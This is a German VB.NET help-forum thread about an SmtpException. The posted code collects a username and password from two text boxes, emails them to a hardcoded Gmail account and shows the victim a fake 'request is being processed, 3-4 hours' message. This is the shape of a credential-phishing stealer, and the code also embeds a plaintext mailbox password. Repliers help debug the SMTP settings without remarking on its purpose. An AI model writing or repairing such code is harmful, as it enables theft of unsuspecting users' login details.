SmtpException wurde nicht behandelt.

  • VB.NET

Es gibt 4 Antworten in diesem Thema. Der letzte Beitrag () ist von ~blaze~.

    SmtpException wurde nicht behandelt.

    Hallo :)
    Ich bin 1. neu hier und 2. relativ unerfahren in Programmieren, Coden etc.
    3. : Ich habe nach dem Problem schon länger gesucht, aber noch nie eine wirkliche Lösung gefunden.
    Ich möchte, dass nachdem man einen Button gedrückt hat, der Inhalt aus Textfeld 1&2 per E-Mail versendet wird.
    Das ganze schaut so aus:



    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("q1w2e3r4t5z6u7i8@gmail.com", "qwertzuiop1")
    smtpServer.Port = 465
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("q1w2e3r4t5z6u7i8@gmail.com")
    mail.To.Add("q1w2e3r4t5z6u7i8@gmail.com")
    mail.Subject = "Username : " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Passwort : " & TextBox2.Text
    smtpServer.Send(mail)
    MsgBox("Deine Anfrage wird bearbeitet und dauert ca. 3-4 Stunden bis sie verarbeitet ist!")

    es kommt immer der error:

    Danke für die Antworten schomal. :)
    Ganz einfach: Der SMTP-Server erwartet von allen Clients die über ihn eine E-Mail versenden wollen eine Authentifizierung. Die hast du mit der Credentials-Eigenschaft offenbar angegeben, darum kann ich nur raten, dass die Daten darin nicht korrekt sind (Groß-/Kleinschreibung berücksichtigt?).
    Weltherrschaft erlangen: 1%
    Ist dein Problem erledigt? -> Dann markiere das Thema bitte entsprechend.
    Waren Beiträge dieser Diskussion dabei hilfreich? -> Dann klick dort jeweils auf den Hilfreich-Button.
    Danke.

    Arby schrieb:

    Ganz einfach: Der SMTP-Server erwartet von allen Clients die über ihn eine E-Mail versenden wollen eine Authentifizierung. Die hast du mit der Credentials-Eigenschaft offenbar angegeben, darum kann ich nur raten, dass die Daten darin nicht korrekt sind (Groß-/Kleinschreibung berücksichtigt?).
    Habe alle Daten nochmals überprüft, sie waren nachwievor richtig. -> geht immer noch nicht...

    felipe12305 schrieb:

    Den Port vlt. auf StandartSMTP setzen?? Der Port ist nämlich 25 nicht der neue mit authMode port ist 587

    PS: Google hilft ;) hab nach "smtp standard port" gegoogled
    Dein 2. Satz ist für mich leider sehr unverständlich formuliert. Ich habe bereits 2 versch. Ports von gmail probiert, mit anderen Anbietern und anderen Ports wie yahoo und web hat es bereits auch nicht funktioniert..